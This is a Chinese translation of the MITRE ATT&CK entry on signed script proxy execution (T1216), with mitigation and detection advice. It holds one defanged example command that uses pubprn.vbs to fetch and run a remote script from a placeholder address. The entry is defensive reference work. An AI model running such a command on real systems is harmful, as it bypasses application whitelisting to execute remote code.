ATT&CK-CN V1.01 Last Update: 2019-11 [返回索引页]

译者: 林妙倩(清华大学网络研究院网络空间安全实习生)、戴亦仑(赛宁网安) 原创翻译作品,如果需要转载请取得翻译作者同意。

数据来源:ATT&CK Matrices

原文: https://attack.mitre.org/techniques/T1216

术语表: /attack/glossary

签名脚本代理执行

具有可信证书签名的脚本可用于代理恶意文件的执行。 这种行为可能会绕过签名验证限制和不考虑这些脚本的应用程序白名单解决方案。 由 Microsoft 签名的 PubPrn.vbs 可用于代理远程站点的执行。 示例命令:cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png 还有一些其他签名脚本可以以类似的方式使用。

缓解

在给定的环境中,可能并不需要某些可用于执行其他程序的签名脚本。 如果给定的系统或网络不需要这些脚本,配置应用程序白名单来拦截它们的执行,防止攻击者潜在的滥用。

检测

监视脚本进程(如 cscript) 和命令行参数,查看是否有可用于代理执行恶意文件的脚本(如 PubPrn.vbs)。